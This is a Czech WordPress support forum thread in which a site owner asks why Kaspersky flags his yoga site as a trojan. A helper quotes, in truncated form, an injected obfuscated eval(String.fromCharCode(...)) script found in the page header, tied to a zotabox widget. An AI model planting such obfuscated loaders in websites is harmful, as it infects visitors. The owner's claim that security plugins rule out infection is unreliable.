Odepření přístupu na web: Důvod: objekt je infikován virem HEUR:Trojan.Script.Ge

Úvodní stránka Fórum podpory WordPressu Problémy s WordPressem Odepření přístupu na web: Důvod: objekt je infikován virem HEUR:Trojan.Script.Ge

Štítky: 

Zvolené téma obsahuje celkem 7 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel  Maitrey a poslední změna je stará 9 měsíců, 1 týden.

Aktuálně je na stránce zobrazeno 8 příspěvků - 1. až 8. (z celkem 8)
  • Autor
    Příspěvky
  • #38261

    Maitrey
    Participant

    Zdravím vás,

    při vstupu na mé stránky se ve windowsech s použitím Kasperskeho objevuje tato hláška:

    Přístup zablokován
    Požadovanou URL adresu nelze zobrazit
    URL adresa objektu:
    http://xxx.cz
    Důvod: objekt je infikován virem HEUR:Trojan.Script.Generic

    Scanner.pcrisk.com hlásí:

    /index.html
    Severity: Suspicious
    Reason: Detected encoded JavaScript code commonly used to hide suspicious behaviour.
    Details: Detected encoded JavaScript code us

    /#
    Severity: Suspicious
    Reason: Detected encoded JavaScript code commonly used to hide suspicious behaviour.
    Details: Detected encoded JavaScript code used to hide suspicious activity

    Setkal se s tím někdo??? Moc děkuju.

    #38262

    flashrad
    Participant

    Dobrý večer, a je tam ten zlej javascript? Ukazuje se třeba v konzoli nebo máte na stránce něco divného? Bez odkazu vám pravděpodobně nikdo nepomůže.

    #38263

    Maitrey
    Participant

    Jsem takovy poloamater a delam si stranky sam, tak se omlouvam, nevim jak to funguje> tady je odkaz> http://www.sohamyoga.cz

    #38264

    flashrad
    Participant

    toto je malware:
    <script async="" src="//static.zotabox.com/<///</script><script language=javascript>eval(String.fromCharCode(118, ......41, 59, 10, 125));</script>/widgets.js"></script>
    načítá se vám v hlavičce

    #38266

    Maitrey
    Participant

    Dobrý večer, je možné že šlo jen o nějakou část pluginu zotabox a ta zmizela hned, jak jsem plugin odinstaloval? Přesně tak se na to totiž teď tváří jak Kasperski (už mu má stránka nevadí), tak scannerprisk.com, který teď hlásí toto:

    Detected potentially suspicious initialization of function pointer to JavaScript method String.fromCharCode __tmpvar2141836699 = String.fromCharCode; <code/>

    Jak jsem říkal v skriptu jsem se radeji nestoural, ale toto je výsledek. Nechápu přesně jak se zbavit i tohoto, ale rozumím tomu dobře, že je to práce pro zkušeného ajťáka a ne jen pro mě, kdo svému koníčku příliš nerozumí?

    Velice děkuji za pomoc!

    #38267

    mirekk
    Participant
    Web

    I vám položím dotaz, na který většina tazatelů neodpoví, ale který je příčinou většiny infikovaných webů: šablonu, v tomto případě DIVI jste získal legálně, tedy koupil?

    #38268

    flashrad
    Participant

    Obecně jsou všechny antiviry alergický na jakoukoliv js funkci používající eval…Takže ano mohlo to být nějaké smetí po tom pluginu…teď už se mi to jeví čistý

    #38269

    Maitrey
    Participant

    Na tuto otázku vám velmi rád odpovím. Pro svůj web používám šablonu DIVI od Elegant Themes:

    LIFETIME ACCESS
    $249
    1-Time

    Toto je odpověď support teamu na stejnou otázku, jakou jsem položil vám:

    Hi Ladislav!
    Plugins, themes and WordPress are always kept updated. Also themes and plugins are from reputable developers, where everything is properly protected by iThemes Security (in our opinion the best security plugin) and the Sucuri plugin are pretty secure against most of the standard hacks.

    Právě proto nevím, proč bych se měl obávat zavirování, když mám od začátku na svých stránkách ještě nad rámec Wordfence a AllinOne WPsecurity plugin.

    Myslím, že tato hláška o malwaru je způli jakási všeobecná marketingová kampaň na úkor které většina běžných uživatelů investuje do nějakého antiviru a nebo antivir pluginu, který je vyjde na balík peněz a už nikdy nezjistí, jestli ho potřebují nebo ne, protože jejich stránky budou tak čisté, jak byly doposud moje. Pro ochranu dat svých zákazníků, jsem koupil zatím pouze dvě licence kaspersky a jeden notebook s Windowsama, kterým se posledních 15 let vyhýbám. Už jsem si skoro myslel, že je pachatelem můj milovaný Linux a tak jsem nainstaloval další dva opensource antiviry a Rkhunter i tam.

    Jsem rád, že je vše v pořádku a že jsem se mohl naučit zase něco navíc, takže nakonec dobrá zkušenost.

    Děkuji všem zúčastněným a přeji hodně úspěchů a klidné svátky.

Aktuálně je na stránce zobrazeno 8 příspěvků - 1. až 8. (z celkem 8)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.